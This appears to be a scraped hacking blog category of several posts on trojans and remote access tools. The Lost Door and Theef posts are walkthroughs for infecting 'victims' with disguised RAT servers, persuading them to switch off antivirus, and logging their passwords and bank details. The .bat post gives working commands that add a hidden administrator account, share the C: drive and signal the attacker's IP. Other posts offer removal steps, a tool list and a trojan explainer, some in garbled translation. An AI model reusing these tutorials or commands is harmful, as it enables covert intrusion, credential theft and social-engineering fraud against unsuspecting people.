Hacking Truths » Trojan Horse

How to Control a Remote Computer using Lost Door

Irfan Shakeel — Sun, 13 Feb 2011 11:52:08 +0000

Remote Administration tools also known as RAT are windows Trojans or in simple terms programs used by a Hacker to get administrative privileges on the victim’s computer. Using a RAT you can do a lot of cool things such as “Upload, delete or modify data” , “Edit registry”, “Capture victim’s screen shot”, “Take control of victim’s Computer”or “Execute a virus” just with a click of a button.

Throughout this article I will teach you how to use Lost Door, a Windows RAT, to control and monitor a victim’s computer remotely.

Disclaimer: Coder and related sites are not responsible for any abuse done using this software.

Follow the steps below to setup a server for Lost Door.

Download Lost Door from here . (Update: In case the given download link doesn’t work, use this secondary download link. The password to unzip this file is “ehacking.nethungry-hacker.com” without double quotes.)
On executing the download file, you will see the following screen. Accept it

After it is open, right click on the window and click on create server

Now enter your IP address and DNS here. Leave the rest of the field as it is.

Now click on the ‘Options’ tab and choose the options as you want. To activate an offline keylogger is a good practice.

Now go to ‘Advanced’ Tab. There will options related to spreading. This will be used in case you have more than 1 victim.

Now just go to the ‘Create’ tab and click on create server. Your server is ready for use now and now send it to the victim.

Sending the server file to your victim

This is the most important thing after you have created your server file. If you want to take control on a single computer than you have to send this server file to the desired victim but if you want to affect more and more people than you have to use some spreading techniques.

If you have physical access to the victim’s computer then take the server file in a pen drive and just double click on your server file once you have injected the pen drive into that computer.
For those who don’t have physical access can use social engineering in order to get the victim execute that file on his computer.

Using Spreading to affect multiple victims

If you have more than one victim, then you have an option of using spreading technique. You might think that by creating multiple server files you can control multiple users. But here is a secret about spreading. When you select the spreading option, the server file will act as a worm which will spread itself across different computers via Email or any other channel. So your burden will be only to get one victim to execute that file on his computer, the remaining job of getting other victims will be done on its own.

About The Author

This post is written by an Irfan Shaeel An Ethical hacker and Penetration tester, Irfan blogs At his blog Ehacking.net

Theef: BackDoor Trojan

Zell Faze — Sat, 21 Nov 2009 21:44:35 +0000

Theef is definitely among the best hacking tools I have ever used. It is easy to use and intuitive, but best of all it gives you a great deal of options. This is why you will be learning to use it today.

Theef is a Windows based application for both the client and server end. The Theef server is a virus that you install on your victims computer, and the Theef client in what you then use to control the virus. The biggest problem with using Theef is that most Anti-Virus programs will pick it up. But with a little bit of social engineering you can generally get people to turn off their AV for you.

Before we begin you need to get a copy of Theef. I have uploaded a copy to Rapid Share here: http://rapidshare.com/files/310301581/theef.zip . If that link does not work, I have posted several others in the forums here

So lets begin. First of all you need a target. This should be relatively easy to find, as I would imagine that the large portion of you reading this article already have someone in mind that you want to hack. If not, feel free to grab a second computer just so you can try this stuff out. For the purpose of this tutorial our victim is named Bob. And we are going to pretend that we are giving him an installer for a game called Awesome Game.

Now you need to convince your victim to turn off their Anti-Virus if they have any. This is because Anti-Virus programs will generally pick up Theef as a virus and delete it. Convincing someone to turn off their Anti-Virus is not often a difficult task, most of the time you can just tell them something along the lines of, "e;Your Anti-Virus says Awesome Game is a virus, but it isn’t so don’t worry about it."e; People are gullible, they want to believe you will cause them no harm, they want to trust you. Use this to your advantage.

The next thing we have to do is configure the program. This is an easy task to do. And to make it easier I will walk you through it using screen shots to help showcase the items you might want to change.

First make a copy of the Theef server. The Theef server is named Server210.exe. Name your copy of the server awesomegame.exe.

Screenshot showing awesomegame.exe is a copy of Server210.exe

Now that we have a copy to work on we need to open up the editor. The server editor is named Editserver210.exe. Once it is opened you should be presented with a window that looks like this:

Screenshot of Theef Server Editor without a server loaded.

From here we need to open up our server for editing using the Load button. Once the server is loaded some values our to be filled into the boxes. The values on the first page can be left alone. In the forums I will be putting up a detailed list of what every option does, but for this tutorial we will only focus on what is needed to give Bob a virus.

To make it look plausible that Awesome Game is indeed a game and not a virus we need to setup a false error message. To do this click Setup->False Error. On this screen check the box to enable false errors, then fill in the Input box labeled text with the following “The installer failed to run!” Your screen should look like this.

Screenshot showing the False Error Screen of the Theef Server Editor

Now the server is ready to be saved and sent. Click the Save button to save the server configuration. The status bar should now say “Finished writing new server settings.” You may now close out of the server editor.

The next step is generally the hardest. You need to send the virus (in our case awesomegame.exe) to your victim and get them to run it. Now for the purposes of our tutorial we have decided to send Bob a “game” by the name of Awesome Game. Little does Bob know that Awesome Game is not a game, but our virus. We have sent Bob Awesome Game using Windows Live Messenger. If your victim is running Vista (like Bob is) then you will need to have them run the virus using Admin privileges.

Now that you have given them the virus the real fun can begin. From here we do everything in the Theef Client. This is the program that you use to control the virus. It is named Client210.exe. You should open it at this point.

Screenshot of Theef Client before connecting to a server.

You will need to get your victims IP address at this point so that you can connect to their computer. This is an easy task to do, and there are numerous ways to accomplish it. For our example we have convinced Bob to go to http://privax.us/ip-test/ and read his IP Address off to us from that page. We could also have gotten him to run ip-config or done any number of other things. If you have no idea what an IP Address is, just direct them to Privax’s IP Test and get them to send you their IP address off the page.

Using one of the aforementioned methods I have determined that Bob’s IP Address is 127.0.0.1 (please note your victim’s IP Address will differ from the address I have used in this example).

I now enter that into the IP input box on the Theef client and press Connect. If you have the correct address and they have run the virus you should see something similar to the following show up in the log box:

[15:56:44] Attempting connection with 127.0.0.1 [15:56:44] Connection established with 127.0.0.1 [15:56:44] Connection accepted [15:56:44] Connected to transfer port

If you don’t have their IP Address correct or they have not run the virus you will see this instead:

[15:57:37] Attempting connection with 127.0.0.1 [15:57:58] Connection failed (Error: 10060)

Now that we are connected we can start to take do stuff. There are numerous features in Theef so I will only cover a small number of them here. I will likely cover more in the forums as time goes on. Also note that not all features of Theef work, and fewer features will work in Vista than in XP.

One of the most useful features of Theef is the key-logger, which is available under the Spy menu. Upon selecting it a key-logger window will open up as shown.

Screenshot of Theef Keylogger before it logs any keys.

After you click the Start button on this window you will begin to see everything that they type on their computer. This is very useful as it shows you ever password they enter. It is a one stop shop to getting their passwords to everything and things such as their bank account numbers, etc.

There are other features in Theef that can be used for just screwing with people as well. Underneath of the Control Menu there is a button labeled Power. If you click that you will notice an Open/Close CD-ROM Drive button. Most people freak out if their CD-ROM Drive randomly opens and closes without them doing anything.

So this concludes my brief tutorial on how to use Theef. There is a lot more in this program that I covered here, but this should give you the basics on how to get started. Below I have posted two videos showing many more things that Theef can do. If you play these videos at the same time you can see how the client controls the server.

Watch Theef Server in Educational & How-To | View More Free Videos Online at Veoh.com

Watch Theef Client Video in Educational & How-To | View More Free Videos Online at Veoh.com

Love,
Haxor ~Zell Faze~
<3

If you liked this tutorial please consider following Haxor ~Zell Faze~ on Twitter.

Three Most used Backdoor Programs

Ashik — Sun, 21 Sep 2008 10:05:24 +0000

There is a general misconception about security today. Most people would love to believe that their firewalls are completely capable to protect them from anything indecent. The sad part, they could not be more wrong. Hungry Hacker aim to prove it with three separate programs that can compromise the security of computers. You have the opportunity to say “What’s a backdoor?” Yes, these programs were created in 1990, but still pose a real threat today. It is the first two that are still being developed.

Using these programs any noob can remotely access your computer without any Authentication and do whatever he wants. I will tell you some of the features rest of them you need to try it and find out. These Programs :

Work as a key logger.
Send any Information from Victim’s PC to the Hacker’s PC.
Run any program on the Victims PC.
Display any Violating Image on victim’s Screen.
Open the CD Drive of the Victim’s PC.
Open any Web page on the Victims Screen.
Disable any Specific Key or whole Keyboard.
Shutdown Victim’s PC.
Start a Song on the Victim’s PC.etc.etc…………..

Back Orifice / Back Orifice 2000

Back Orifice is one of the most common backdoor programs, and one of the most deadly. The name may seem like a joke, but sure, the threat is real. Back Orifice was established in Cult of the Dead Cow group. Back Orifice is an Open Source Program. The main Threat of this software is that by making some changes in the code anybody can make it undetectable to the Anti virus Program running on the Victim’s computer. Apart from the strange title, the program usually gets port 31337, the reference to “Lit” phenomenon is popular among hackers.

Back Orifice uses a client-server model, while the server and client is the victim attacker. What makes Back Orifice so dangerous that it can install and operate silently. There is not required interaction with the user in, meaning you could its on your computer right now, and do not know.

Companies such as Symantec have taken steps to protect computers against programs that they consider dangerous. But even more attacks using Back Orifice 2000. This is due partly to the fact that it is still evolving, as open source. As stated in the documentation the goal is ultimately the presence of the Back Orifice 2000 unknown even to those who installed it.

Back Orifice 2000, developed for Windows 95, Windows 98, Windows NT, Windows 2000 and Windows XP.

Where can I download Back orifice 2000?

Back Orifice 2000 can be downloaded at the following address: http://sourceforge.net/projects/bo2k/

I infected! How do I remove it?

Removing Back Orifice 2000 may require that you change the registry settings. To remove it at 7 simple steps, refer to the diagram below.

How do I delete Back orifice 2000

Click Start> Run, and type “Regedit”(without the quotes)
Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices “
Now looking in the right box: “The umgr32 = ‘c: \ windows \ system \ umgr32.exe”
Right-click on this entry and click Remove. Now restart your computer.
After restarting only open Windows Explorer. Make sure you can see all registered extensions. To do so, select “View Options and configure the appropriate settings.
Go to the WINDOWS \ SYSTEM directory, and find “umgr32.exe” file. Once you find it, delete it.
Exit Windows Explorer and reboot again.

NetBus / Netbus 2.0 Pro

NetBus was established around the same time that the Back Orifice was in the late 1990′s. NetBus was originally designed as a program prank friends and family, of course anything too malicious. However, the program was released in 1998, and is widely used as a backdoor to manage computer.

Like the Back Orifice, NetBus allows attackers to do virtually everything in the computer victim. It also works well under Windows 9x systems, as well as Windows XP. Unlike Back Orifice, the latest version of NetBus regarded shareware is not free. NetBus is also implementing less stealthy operations, as a direct result of criticism and complaints of abusive use.

Where can I buy and download NetBus?

NetBus can be purchased and downloaded at the following address: http://www.netbus.org/

Ok, I am infected. Now what?

Fortunately, the latest version of NetBus is a valid program. It can be removed just like any other program. Previous issuance NetBus is a bit more tricky, however. If you are not lucky enough attacked with the latest version, the withdrawal process and in the Back Orifice.

How do I remove NetBus?

Click Start> Run, and type “Regedit ‘(without the quotes)
Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices “
Now, in the right box, looking as follows: “[Name_of_Server].”Exe Of course, you have to find the actual name of this file EXE-. Usually This” Patch.exe ‘or’ SysEdit.exe “, but may vary.
Reboot and remove all traces of the actual program, which can be left. Additionally, you can set yourself NetBus, and then use its own function disposal.

SubSeven / Sub7

SubSeven or Sub7, has been established for the same purpose was to NetBus pranks. Sub7 actually has more support for pranks, and has more advanced users. Sub7 also widely used by the script kiddies, although that many firewalls and anti-virus software before initialization.

Since Sub7 not supported for several years, the threat is usually very low. Most security programs will not have any problem in ending Sub7 before it has a chance to be started. This shows that the importance to the modernization and security programs is critical, because the money was still there.

Nevertheless, it is widely used by those who have physical access to your firewall, or security programs. If access rights, the tool will work without restrictions.

Where can I buy and download Sub7?

Sub7 not supported more, and hence is not available for download on any legitimate websites. If you were to make a Google search, you would find links to download Sub7. However, this is not the official site, and should be considered dubious and dangerous.

Sounds harmless, How do I remove it?

End of the following processes through the curator: “editserver.exe, subseven.exe”
Delete the following files: “editserver.exe, subseven.exe, tutorial.txt.”

Why these programs is absolutely legitimate?

All the basis behind these programs is that they are designed to help people, not harm. While some like NetBus really were originally created for pranks, they switched routes to avoid legal problems.

These programs claim to be the legitimate remote desktop program, although they certainly easily used for malicious use. These programs really should be used to aid or customer support departments. Why all adolescents is to copy these programs goes beyond us, but leave the content of their networks, while computer is a good idea.

The advent of new technology has made these programs in some respects less effective. However, programs such as Back Orifice 2000, yet still evolving, so do not be surprised to learn that he works in the background, waiting for instructions. Since the best defense is a good offense, be sure to save a sharp eye on what is installed on the network computers. After all, an ounce of prevention is worth a pound of cure.

Making your own trojan in a .bat file

Ashik — Mon, 09 Jun 2008 17:14:06 +0000

Open a dos prompt we will only need a dos prompt , and windows xp…

-Basics-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok

Now insert this command: net
And you will get something like this

Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:

dir
pause

And now save this as test.bat and execute it.
Funny aint it ?

———————- Starting ——————-
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.

Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant

Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it’s nice
yo know wich version of windows xp you are going to try share.

Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.

-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

———————–: Client :—————-
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.

Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!

Top 10 Linux Hacking Tools

Ashik — Mon, 12 May 2008 19:04:01 +0000

This is a Cool Collection of Top Ten Linux Hacking Tools.

1. nmap – Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available.

2. Nikto – Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

3. THC-Amap – Amap is a next-generation tool for assistingnetwork penetration testing. It performs fast and reliable application protocol detection, independant on the TCP/UDP port they are being bound to.

4. Ethereal – Ethereal is used by network professionals around the world for troubleshooting, analysis, software and protocol development, and education. It has all of the standard features you would expect in a protocol analyzer, and several features not seen in any other product.

5. THC-Hydra – Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

6. Metasploit Framework – The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. This project initially started off as a portable network game and has evolved into a powerful tool for penetration testing, exploit development, and vulnerability research.

7. John the Ripper – John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

8. Nessus – Nessus is the world’s most popular vulnerability scanner used in over 75,000 organisations world-wide. Many of the world’s largest organisations are realising significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

9. IRPAS – Internetwork Routing Protocol Attack Suite – Routing protocols are by definition protocols, which are used by routers to communicate with each other about ways to deliver routed protocols, such as IP. While many improvements have been done to the host security since the early days of the Internet, the core of this network still uses unauthenticated services for critical communication.

10. Rainbowcrack – RainbowCrack is a general propose implementation of Philippe Oechslin’s faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called “rainbow table”.

Trojan Trojan !! What is it ?

Ashik — Mon, 03 Sep 2007 06:31:00 +0000

Trojan horse well this term has many meanings .
In the context of computer software, a Trojan horse is a malicious program that is disguised as or embedded within legitimate software. The term is derived from the classical myth of the Trojan Horse. They may look useful or interesting (or at the very least harmless) to an unsuspecting user, but are actually harmful when executed.

Often the term is shortened to simply Trojan, even though this turns the adjective into a noun, reversing the myth (Greeks were gaining malicious access, not Trojans).

There are two common types of Trojan horses.

One, is otherwise useful software that has been corrupted by a cracker inserting malicious code that executes while the program is used. Examples include various implementations of weather alerting programs, computer clock setting software, and peer to peer file sharing utilities.

The other type is a standalone program that masquerades as something else, like a game or image file, in order to trick the user into some misdirected complicity that is needed to carry out the program’s objectives.

for more info Click Here

Trojan horse programs cannot operate autonomously, in contrast to some other types of malware, like viruses or worms. Just as the Greeks needed the Trojans to bring the horse inside for their plan to work, Trojan horse programs depend on actions by the intended victims. As such, if trojans replicate and even distribute themselves, each new victim must run the program/trojan. Therefore their virulence is of a different nature, depending on successful implementation of social engineering concepts rather than flaws in a computer system’s security design or configuration.
Definition

A Trojan horse program has a useful and desired function, or at least it has the appearance of having such. Trojans use false and fake names to trick users into dismissing the processes. These strategies are often collectively termed social engineering. In most cases the program performs other, undesired functions, but not always. The useful, or seemingly useful, functions serve as camouflage for these undesired functions. A trojan is designed to operate with functions unknown to the victim. The kind of undesired functions are not part of the definition of a Trojan Horse; they can be of any kind, but typically they have malicious intent.

In practice, Trojan Horses in the wild often contain spying functions (such as a packet sniffer) or backdoor functions that allow a computer, unknown to the owner, to be remotely controlled from the network, creating a “zombie computer”. The Sony/BMG rootkit Trojan, distributed on millions of music CDs through 2005, did both of these things. Because Trojan horses often have these harmful behaviors, there often arises the misunderstanding that such functions define a Trojan Horse.

In the context of Computer Security, the term ‘Trojan horse’ was first used in a seminal report edited/written by JP Anderson (aka ‘The Anderson Report’ (Computer Security Technology Planning, Technical Report ESD-TR-73-51, USAF Electronic Sysstem Division, Hanscom AFB, Oct, 1972), which credits Daniel J Edwards then of NSA for both the coinage and the concept. One of the earliest known Trojans was a binary Trojan distributed in the binary Multics distribution; it was described by PA Karger and RR Schell in 1974 (Multics Security Evaluation, Technical Report ESD-TR-74-193 vol II, HQ Electronic Systems Division, Hanscom AFB, June 1974).

The basic difference from computer viruses is that a Trojan horse is technically a normal computer program and does not possess the means to spread itself. The earliest known Trojan horses were not designed to spread themselves. They relied on fooling people to allow the program to perform actions that they would otherwise not have voluntarily performed.

Trojans implementing backdoors typically setup a hidden server, from which a hacker with a client can then log on to. They have become polymorphic, process injecting, prevention disabling, easy to use without authorization, and therefore are abusive.

Trojans of recent times also come as computer worm payloads. It is important to note that the defining characteristics of Trojans are that they require some user interaction, and cannot function entirely on their own nor do they self-propagate/replicate.

Examples

Example of a simple Trojan horse

A simple example of a trojan horse would be a program named “waterfalls.scr.exe” claiming to be a free waterfall screensaver which, when run, instead begins erasing all the files on the computer.

Example of a somewhat advanced Trojan horse

On the Microsoft Windows platform, an attacker might attach a Trojan horse with an innocent-looking filename to an email message which entices the recipient into opening the file. The Trojan horse itself would typically be a Windows executable program file, and thus must have an executable filename extension such as .exe, .com, .scr, .bat, or .pif. Since Windows is sometimes configured by default to hide filename extensions from a user, the Trojan horse is an extension that might be “masked” by giving it a name such as ‘Readme.txt.exe’. With file extensions hidden, the user would only see ‘Readme.txt’ and could mistake it for a harmless text file. Icons can also be chosen to imitate the icon associated with a different and benign program, or file type.

When the recipient double-clicks on the attachment, the Trojan horse might superficially do what the user expects it to do (open a text file, for example), so as to keep the victim unaware of its real, concealed, objectives. Meanwhile, it might discreetly modify or delete files, change the configuration of the computer, or even use the computer as a base from which to attack local or other networks – possibly joining many other similarly infected computers as part of a distributed denial-of-service attack. The Sony/BMG rootkit mentioned above both installed a vulnerability on victim computers, but also acted as spyware, reporting back to a central server from time to time, when any of the music CDs carrying it were played on a Windows computer system.

Types of Trojan horses

Trojan horses are almost always designed to do various harmful things, but could be harmless. Examples are
erasing or overwriting data on a computer.
encrypting files in a cryptoviral extortion attack.
corrupting files in a subtle way.
upload and download files.
allowing remote access to the victim’s computer. This is called a RAT. (remote administration tool)
spreading other malware, such as viruses. In this case the Trojan horse is called a ‘dropper’ or ‘vector’.
setting up networks of zombie computers in order to launch DDoS attacks or send spam.
spying on the user of a computer and covertly reporting data like browsing habits to other people (see the article on spyware).
make screenshots.
logging keystrokes to steal information such as passwords and credit card numbers (also known as a keylogger).
phish for bank or other account details, which can be used for criminal activities.
installing a backdoor on a computer system.
opening and closing CD-ROM tray

Time bombs and logic bombs

“Time bombs” and “logic bombs” are types of trojan horses.

“Time bombs” activate on particular dates and/or times. “Logic bombs” activate on certain conditions met by the computer.

Precautions against Trojan horses

Trojan horses can be protected against through end user awareness. Trojan Horse viruses can cause a great deal of damage to a personal computer but even more damaging is what they can do to a business, particularly a small business that usually does not have the same virus protection capabilities as a large business. Since a Trojan Horse virus is hidden it is harder to protect yourself or your company from them but there are things that you can do.

Trojan Horses are most commonly spread through an e-mail, much like other types of common viruses. The only difference being of course is that a Trojan Horse is hidden. The best ways to protect yourself and your company from Trojan Horses are as follows:

1. If you receive e-mail from someone that you do not know or you receive an unknown attachment never open it right away. As an e-mail use you should confirm the source. Some hackers have the ability to steal an address books so if you see e-mail from someone you know that does not necessarily make it safe.

2. When setting up your e-mail client make sure that you have the settings so that attachments do not open automatically. Some e-mail clients come ready with an anti-virus program that scans any attachments before they are opened. If your client does not come with this it would be best to purchase on or download one for free.

3. Make sure your computer has an anti-virus program on it and make sure you update it regularly. If you have an auto-update option included in your anti-virus program you should turn it on, that way if you forget to update your software you can still be protected from threats

4. Operating systems offer patches to protect their users from certain threats and viruses, including Trojan Horses. Software developers like Microsoft offer patches that in a sense “close the hole” that the Trojan horse or other virus would use to get through to your system. If you keep your system updated with these patches your computer is kept much safer.

5. Avoid using peer-2-peer or P2P sharing networks like Kazaa , Limewire, Ares, or Gnutella because those programs are generally unprotected from viruses and Trojan Horse viruses are especially easy to spread through these programs. Some of these programs do offer some virus protection but often they are not strong enough.

Besides these sensible precautions, one can also install anti-trojan software, some of which are offered free.

Methods of Infection

The majority of trojan horse infections occur because the user was tricked into running an infected program. This is why you’re not supposed to open unexpected attachments on emails — the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a trojan or worm. The infected program doesn’t have to arrive via email, though; it can be sent to you in an Instant Message, downloaded from a Web site or by FTP, or even delivered on a CD or floppy disk. (Physical delivery is uncommon, but if you were the specific target of an attack, it would be a fairly reliable way to infect your computer.) Furthermore, an infected program could come from someone who sits down at your computer and loads it manually.

Websites: You can be infected by visiting a rogue website. Internet Explorer is most often targeted by makers of trojans and other pests, because it contains numerous bugs, some of which improperly handle data (such as HTML or images) by executing it as a legitimate program. (Attackers who find such vulnerabilities can then specially craft a bit of malformed data so that it contains a valid program to do their bidding.) The more “features” a web browser has (for example ActiveX objects, and some older versions of Flash or Java), the higher your risk of having security holes that can be exploited by a trojan horse.

Email: If you use Microsoft Outlook, you’re vulnerable to many of the same problems that Internet Explorer has, even if you don’t use IE directly. The same vulnerabilities exist since Outlook allows email to contain HTML and images (and actually uses much of the same code to process these as Internet Explorer). Furthermore, an infected file can be included as an attachment. In some cases, an infected email will infect your system the moment it is opened in Outlook — you don’t even have to run the infected attachment.

For this reason, using Outlook lowers your security substantially.

Open ports: Computers running their own servers (HTTP, FTP, or SMTP, for example), allowing Windows file sharing, or running programs that provide filesharing capabilities such as Instant Messengers (AOL’s AIM, MSN Messenger, etc.) may have vulnerabilities similar to those described above. These programs and services may open a network port giving attackers a means for interacting with these programs from anywhere on the Internet. Vulnerabilities allowing unauthorized remote entry are regularly found in such programs, so they should be avoided or properly secured.

A firewall may be used to limit access to open ports. Firewalls are widely used in practice, and they help to mitigate the problem of remote trojan insertion via open ports, but they are not a totally impenetrable solution, either.